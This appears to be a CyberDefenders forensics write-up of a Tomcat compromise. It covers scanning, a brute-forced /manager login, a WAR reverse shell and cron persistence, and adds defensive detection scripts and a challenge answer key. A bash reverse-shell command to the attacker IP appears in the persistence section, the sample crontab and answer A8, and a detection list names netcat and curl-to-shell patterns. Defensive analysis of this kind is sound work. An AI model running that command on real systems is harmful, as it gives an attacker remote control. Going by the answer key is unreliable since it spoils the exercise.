// CyberDefenders  ·  Network Forensics

Tomcat Takeover

CyberDefenders · Easy · Wireshark
[Reconnaissance, Execution, Persistence, Privilege Escalation, Credential Access, Discovery, Command and Control]

Scenario

Overview

A web server on the company intranet was flagged for suspicious activity. A PCAP was captured for analysis. The goal was to reconstruct the full attack chain — from initial reconnaissance through to persistence — against an Apache Tomcat web server.


Investigation

Identifying the Attacker

With only one external IP address present in the capture, the attacker was immediately identifiable.

[Figure: tomcat_conversion.png]

Geolocation placed the source IP in China.

Attacker IP: 14[.]0[.]0[.]120

[Figure: tomcat_geolocation.png]

Reconnaissance

Filtering on the attacker's IP address revealed a port scan, and narrowing to HTTP traffic showed directory enumeration activity consistent with Gobuster:

ip.addr == 14.0.0.120 && http

[Figure: tomcat_gobuster.png]

The scan uncovered several open ports. Port 8080 was identified as exposing the Tomcat admin panel.


Directory Enumeration

HTTP stream analysis confirmed Gobuster was used to enumerate directories. The attacker successfully discovered the /manager endpoint — Tomcat’s web application manager interface.


Credential Brute Force

With the admin panel located, the attacker brute-forced credentials. The successful login was:

Username: admin
Password: tomcat

[Figure: tomecat_auth.png]


WAR File Upload / Reverse Shell

Following authentication to /manager, the attacker uploaded a malicious WAR file to deploy a reverse shell:

Filename: JXQOZY.war

HTTP stream analysis of the POST request confirmed the upload. Following the resulting TCP stream revealed the attacker’s shell session.

[Figure: tomcat_shellupload.png]

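The reconnaissance, enumeration, brute-force and upload stages above each leave a distinct pattern in the capture. The following Python script is an added example, not part of the original write-up or of any CyberDefenders material; it performs the same four checks an analyst does by hand in Wireshark, over a small constructed set of packet summaries. The SYN and HTTP records embedded in the script are made up for the example, with only the attacker IP, the credentials and the WAR filename taken from the write-up; the Gobuster User-Agent string and Tomcat's /manager/html/upload path are assumptions. On real data the equivalent fields would be exported from the PCAP with tshark.

```python
import base64
from collections import defaultdict

ATTACKER = "14.0.0.120"          # attacker IP from the capture
GOBUSTER_UA = "gobuster/3.1"     # assumed default Gobuster User-Agent

# Constructed TCP SYN summaries as (src_ip, dst_port), standing in for the output of
#   tshark -r capture.pcap -Y "tcp.flags.syn==1 && tcp.flags.ack==0" -T fields -e ip.src -e tcp.dstport
# These are not taken from the challenge PCAP.
SYN_LOG = [(ATTACKER, p) for p in (21, 22, 80, 443, 8009, 8080)] + [("10.10.10.15", 8080)]


def basic(creds: str) -> str:
    """Build an HTTP Basic Authorization header value from user:password."""
    return "Basic " + base64.b64encode(creds.encode()).decode()


def req(src, method, uri, status, ua="Mozilla/5.0", auth=None, filename=None):
    """One HTTP request summary: who sent what, and the status the server returned."""
    return {"src": src, "method": method, "uri": uri, "status": status,
            "ua": ua, "auth": auth, "filename": filename}


# Constructed HTTP request summaries, in the order the attack chain unfolded.
HTTP_LOG = [
    req("10.10.10.15", "GET", "/", 200),                       # benign intranet client
]
# Directory enumeration: a burst of 404s under a scanner User-Agent, then the hit on /manager.
for path in ("/admin", "/backup", "/cgi-bin", "/console", "/login", "/phpmyadmin",
             "/test", "/uploads", "/wp-admin", "/.git", "/config", "/secret"):
    HTTP_LOG.append(req(ATTACKER, "GET", path, 404, ua=GOBUSTER_UA))
HTTP_LOG.append(req(ATTACKER, "GET", "/manager", 302, ua=GOBUSTER_UA))
# Credential guessing against the manager: three 401s, then a 200.
for guess in ("admin:admin", "admin:password", "tomcat:tomcat"):
    HTTP_LOG.append(req(ATTACKER, "GET", "/manager/html", 401, auth=basic(guess)))
HTTP_LOG.append(req(ATTACKER, "GET", "/manager/html", 200, auth=basic("admin:tomcat")))
# WAR deployment through the manager's upload form (assumed standard Tomcat upload path).
HTTP_LOG.append(req(ATTACKER, "POST", "/manager/html/upload", 200,
                    auth=basic("admin:tomcat"), filename="JXQOZY.war"))


def port_scanners(syn_log, min_ports=5):
    """Sources that sent SYNs to at least min_ports distinct destination ports."""
    ports = defaultdict(set)
    for src, port in syn_log:
        ports[src].add(port)
    return {src: sorted(p) for src, p in ports.items() if len(p) >= min_ports}


def enumeration_sources(http_log, min_404=10):
    """Sources showing directory brute force: a burst of 404s or a known scanner UA."""
    hits = defaultdict(lambda: {"404s": 0, "scanner_ua": set()})
    for r in http_log:
        if r["status"] == 404:
            hits[r["src"]]["404s"] += 1
        if r["ua"].lower().startswith(("gobuster", "dirbuster", "dirb", "ffuf", "feroxbuster")):
            hits[r["src"]]["scanner_ua"].add(r["ua"])
    return {src: h for src, h in hits.items() if h["404s"] >= min_404 or h["scanner_ua"]}


def manager_logins(http_log):
    """Per source: failed Basic-auth attempts against /manager and the first
    credential pair that was accepted, decoded from the Authorization header."""
    result = defaultdict(lambda: {"failed": 0, "success": None})
    for r in http_log:
        if not r["uri"].startswith("/manager") or not r["auth"]:
            continue
        scheme, _, blob = r["auth"].partition(" ")
        if scheme.lower() != "basic":
            continue
        creds = base64.b64decode(blob).decode("utf-8", errors="replace")
        if r["status"] == 401:
            result[r["src"]]["failed"] += 1
        elif r["status"] == 200 and result[r["src"]]["success"] is None:
            result[r["src"]]["success"] = creds
    return dict(result)


def war_uploads(http_log):
    """POSTs to the manager that carry a .war file, i.e. code deployment on the server."""
    return [(r["src"], r["filename"]) for r in http_log
            if r["method"] == "POST" and r["uri"].startswith("/manager")
            and r["filename"] and r["filename"].lower().endswith(".war")]


if __name__ == "__main__":
    print("port scanners:  ", port_scanners(SYN_LOG))
    print("enumeration:    ", enumeration_sources(HTTP_LOG))
    print("manager logins: ", manager_logins(HTTP_LOG))
    print("WAR uploads:    ", war_uploads(HTTP_LOG))
```

Each function answers one of the write-up's questions from the traffic alone: distinct destination ports per source for the scan, 404 bursts and scanner User-Agents for enumeration, the 401-then-200 sequence on /manager (with the Basic header decoded) for the brute force, and a multipart POST carrying a .war for the deployment. The thresholds are deliberately parameters; the defaults suit a quiet intranet server and should be tuned on a busier one.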

Persistence

After establishing the reverse shell, the attacker scheduled a cron job to maintain persistent access:

Scheduled command:

/bin/bash -c 'bash -i >& /dev/tcp/14[.]0[.]0[.]120/443 0>&1'

[Figure: tomcat_revshell.png]

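The persistence step leaves a host-side artifact as well as the network callback: the cron entry itself. The script below is an added example, not from the original write-up, that parses a constructed per-user crontab (the scheduled command is the one recovered above; the other entries and the indicator list are assumptions) and flags jobs with reverse-shell characteristics, extracting the callback host and port from the /dev/tcp path so it can be matched against the network IOCs.

```python
import re

# Constructed crontab for the Tomcat service account; not from the challenge host.
# The last entry is the scheduled command recovered from the capture.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
0 2 * * * /usr/bin/find /opt/tomcat/logs -name '*.log' -mtime +14 -delete
@reboot /opt/tomcat/bin/startup.sh
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'
"""

# (regex, reason) pairs; an assumed, non-exhaustive list of reverse-shell traits.
REVERSE_SHELL_INDICATORS = [
    (r"/dev/tcp/", "bash network redirection to a remote socket"),
    (r"\bbash -i\b", "interactive bash spawned from a non-interactive job"),
    (r"\bnc\b.*\s-e\s", "netcat with -e (program execution)"),
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "download piped straight into a shell"),
    (r"base64\s+(-d|--decode).*\|\s*(ba)?sh\b", "base64-decoded payload piped into a shell"),
]
CALLBACK_RE = re.compile(r"/dev/tcp/([\w.\-]+)/(\d+)")
# Either an @reboot-style shorthand or five schedule fields, then the command.
SCHEDULE_RE = re.compile(r"^(@\w+|(?:\S+\s+){5})(.*)$")


def parse_crontab(text):
    """Return (schedule, command) pairs, skipping comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = SCHEDULE_RE.match(line)
        if m:
            jobs.append((m.group(1).strip(), m.group(2).strip()))
    return jobs


def find_suspicious_jobs(text):
    """Flag jobs matching any indicator, with the reasons and any /dev/tcp callback."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = [why for pat, why in REVERSE_SHELL_INDICATORS if re.search(pat, command)]
        if not reasons:
            continue
        cb = CALLBACK_RE.search(command)
        findings.append({
            "schedule": schedule,
            "command": command,
            "reasons": reasons,
            "callback": (cb.group(1), int(cb.group(2))) if cb else None,
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_jobs(SAMPLE_CRONTAB):
        print(f"[{f['schedule']}] {f['command']}")
        for why in f["reasons"]:
            print("   -", why)
        if f["callback"]:
            print("   callback:", "%s:%d" % f["callback"])
```

Run against the output of `crontab -l` for the service account (and the system crontab files, whose lines carry an extra user field before the command) this turns the single line found in the capture into a repeatable host check, and the extracted callback pair is what should be cross-referenced with the C2 IOC in the table below.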

MITRE ATT&CK

Technique                                        ID          Description
Network Service Scanning                         T1046       Port scan to identify open services
Brute Force                                      T1110       Credential brute-force against Tomcat manager
Server Software Component: Web Shell             T1505.003   WAR file upload for server-side execution
Command and Scripting Interpreter: Unix Shell    T1059.004   Bash reverse shell
Scheduled Task/Job: Cron                         T1053.003   Cron-based persistence

IOCs

Type               Value
Attacker IP        14[.]0[.]0[.]120
Attacker Country   China
Admin Port         8080
Enumeration Tool   Gobuster
Admin Directory    /manager
Credentials        admin:tomcat
Malicious File     JXQOZY.war
C2 Callback        14[.]0[.]0[.]120:443

Lessons Learned


References

MITRE ATT&CK T1505.003 - Server Software Component: Web Shell


Challenge Questions

Q1. Given the suspicious activity detected on the web server, the PCAP file reveals a series of requests across various ports, indicating potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?
A1. 14.0.0.120

Q2. Based on the identified IP address associated with the attacker, can you identify the country from which the attacker's activities originated?
A2. china

Q3. From the PCAP file, multiple open ports were detected as a result of the attacker's active scan. Which of these ports provides access to the web server admin panel?
A3. 8080

Q4. Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?
A4. gobuster

Q5. After the effort to enumerate directories on our web server, the attacker made numerous requests to identify administrative interfaces. Which specific directory related to the admin panel did the attacker uncover?
A5. /manager

Q6. After accessing the admin panel, the attacker tried to brute-force the login credentials. Can you determine the correct username and password that the attacker successfully used for login?
A6. admin:tomcat

Q7. Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?
A7. JXQOZY.war

Q8. After successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?
A8. /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'